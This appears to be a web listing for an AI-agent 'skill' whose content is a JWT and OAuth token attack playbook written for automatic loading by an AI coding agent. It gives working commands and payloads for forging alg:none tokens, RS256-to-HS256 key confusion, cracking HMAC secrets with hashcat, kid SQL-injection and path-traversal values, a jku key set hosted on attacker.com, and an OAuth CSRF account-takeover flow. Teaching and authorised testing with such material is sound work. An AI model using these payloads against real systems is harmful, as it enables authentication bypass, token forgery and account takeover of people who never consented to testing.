401-403-bypass-techniq…
401/403 bypass playbook. Use when encountering access-denied responses on admin panels, API endpoints, or restricted paths. Covers path manipulation, HTTP…
JWT and OAuth token attack playbook. Use when validating token trust, signing algorithms, key handling, claim abuse, bearer flows, and OAuth account-binding weaknesses.
$ npx -y skills add yaklang/hack-skills --skill jwt-oauth-token-attacks --agent claude-codeHow it fires
How this skill gets triggered: by you, by Claude, or both.
/jwt-oauth-token-attacksContext preview
The summary Claude sees to decide when to auto-load this skill.
JWT and OAuth token attack playbook. Use when validating token trust, signing algorithms, key handling, claim abuse, bearer flows, and OAuth account-binding weaknesses.
name: jwt-oauth-token-attacks description: >- JWT and OAuth token attack playbook. Use when validating token trust, signing algorithms, key handling, claim abuse, bearer flows, and OAuth account-binding weaknesses.
> **AI LOAD INSTRUCTION**: Expert authentication token attacks. Covers JWT cryptographic attacks (alg:none, RS256→HS256, secret crack, kid/jku injection), OAuth flow attacks (CSRF, open redirect, token theft, implicit flow abuse), PKCE bypass, and token leakage via Referer/logs. This is critical for modern web applications.
Use this file for token-centric attacks and flow abuse. Also load:
---
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEyMzQsInJvbGUiOiJ1c2VyIn0.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
└─────────────────────┘ └────────────────────────────┘ └──────────────────────────────────────────┘
HEADER PAYLOAD SIGNATURE**Decode in terminal**:
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9" | base64 -d
# → {"alg":"HS256","typ":"JWT"}
echo "eyJ1c2VySWQiOjEyMzQsInJvbGUiOiJ1c2VyIn0" | base64 -d
# → {"userId":1234,"role":"user"}**Common claim targets** (modify to escalate):
{
"role": "admin",
"isAdmin": true,
"userId": OTHER_USER_ID,
"email": "victim@target.com",
"sub": "admin",
"permissions": ["admin", "write", "delete"],
"tier": "premium"
}---
Server doesn't validate signature when algorithm is "none"/"None"/"NONE":
# Burp JWT Editor / python-jwt attack:
# Step 1: Decode header
echo '{"alg":"HS256","typ":"JWT"}' | base64 → old_header
# Step 2: Create new header
echo -n '{"alg":"none","typ":"JWT"}' | base64 | tr -d '=' | tr '/+' '_-'
# Step 3: Modify payload (e.g., role → admin):
echo -n '{"userId":1234,"role":"admin"}' | base64 | tr -d '=' | tr '/+' '_-'
# Step 4: Construct token with empty signature:
HEADER.PAYLOAD.
# OR:
HEADER.PAYLOAD**Tool (jwt_tool)**:
python3 jwt_tool.py JWT_TOKEN -X a # → automatically generates alg:none variants
---
**When server uses RS256** (asymmetric — RSA private key signs, public key verifies):
# Step 1: Obtain public key (PEM format)
# From: /api/.well-known/jwks.json → convert to PEM
# From: /certs endpoint
# From: OpenSSL extraction from HTTPS cert
# Step 2: Use jwt_tool to sign with HS256 using public key as secret:
python3 jwt_tool.py JWT_TOKEN -X k -pk public_key.pem
# Step 3: Manually:
# Modify header: {"alg":"HS256","typ":"JWT"}
# Sign entire header.payload with HMAC-SHA256 using PEM public key bytes---
HMAC-based JWTs (HS256/HS384/HS512) with weak secret:
# hashcat (fast): hashcat -a 0 -m 16500 "JWT_TOKEN_HERE" /usr/share/wordlists/rockyou.txt # john: echo "JWT_TOKEN_HERE" > jwt.txt john --format=HMAC-SHA256 --wordlist=/usr/share/wordlists/rockyou.txt jwt.txt # jwt_tool: python3 jwt_tool.py JWT_TOKEN -C -d /path/to/wordlist.txt
**Common weak secrets to test manually**:
secret, password, 123456, qwerty, changeme, your-256-bit-secret, APP_NAME, app_name, production, jwt_secret, SECRET_KEY
---
The `kid` header parameter specifies which key to use for verification. No sanitization = injection:
{"alg":"HS256","kid":"' UNION SELECT 'attacker_controlled_key' FROM dual--"}If backend queries SQL: `SELECT key FROM keys WHERE kid = 'INPUT'` Result: HMAC key = `'attacker_controlled_key'` → forge any payload signed with this value.
{"alg":"HS256","kid":"../../../../dev/null"}Server reads `/dev/null` as key → empty string → sign token with empty HMAC.
{"alg":"HS256","kid":"../../../../etc/hostname"}Server reads hostname as key → forge tokens signed with hostname string.
---
`jku` points to JSON Web Key Set URL. If not whitelisted:
{"alg":"RS256","jku":"https://attacker.com/malicious-jwks.json","kid":"my-key"}**Setup**:
# Generate RSA key pair: openssl genrsa -out private.pem 2048 openssl rsa -in private.pem -pubout -out public.pem # Create JWKS: python3 -c " import json, base64, struct # ... (use python-jwcrypto or jwt_tool to export JWKS) " # Host malicious JWKS at attacker.com/malicious-jwks.json # Sign JWT with attacker's private key # Server fetches attacker's JWKS → verifies with attacker's public key → accepts
**jwt_tool automation**:
python3 jwt_tool.py JWT -X s -ju https://attacker.com/malicious-jwks.json
---
State parameter prevents CSRF in OAuth. If missing:
Attack: 1. Click "Login with Google" → OAuth starts → intercept the redirect URL: https://accounts.google.com/oauth2/auth?client_id=APP_ID&redirect_uri=https://target.com/callback&state=MISSING_OR_PREDICTABLE&code=... 2. Get the authorization code (stop before exchanging it) 3. Craft URL: https://target.com/oauth/callback?code=ATTACKER_CODE 4. Victim clicks that URL → their session binds to ATTACKER's OAuth identity → ACCOUNT TAKEOVER
---
Master Entry → Category Entries → Deep Topic Skills One master entry, six category entries, and 102 deep topic skills across 14 security domains.
Repo: yaklang/hack-skills
401/403 bypass playbook. Use when encountering access-denied responses on admin panels, API endpoints, or restricted paths. Covers path manipulation, HTTP…
Active Directory ACL abuse playbook. Use when exploiting misconfigured AD permissions including GenericAll, WriteDACL, DCSync rights, shadow credentials, LAPS…
AD Certificate Services attack playbook. Use when targeting misconfigured AD CS for privilege escalation via ESC1-ESC13 template abuse, NTLM relay to…
Kerberos attack playbook for Active Directory. Use when targeting AD authentication via AS-REP roasting, Kerberoasting, golden/silver/diamond tickets,…
AI/ML security playbook. Use when assessing model supply chain attacks (pickle RCE, poisoned weights), adversarial examples, model poisoning, model stealing,…
Android pentesting playbook. Use when testing Android applications for SSL pinning bypass, exported component abuse, WebView vulnerabilities, intent…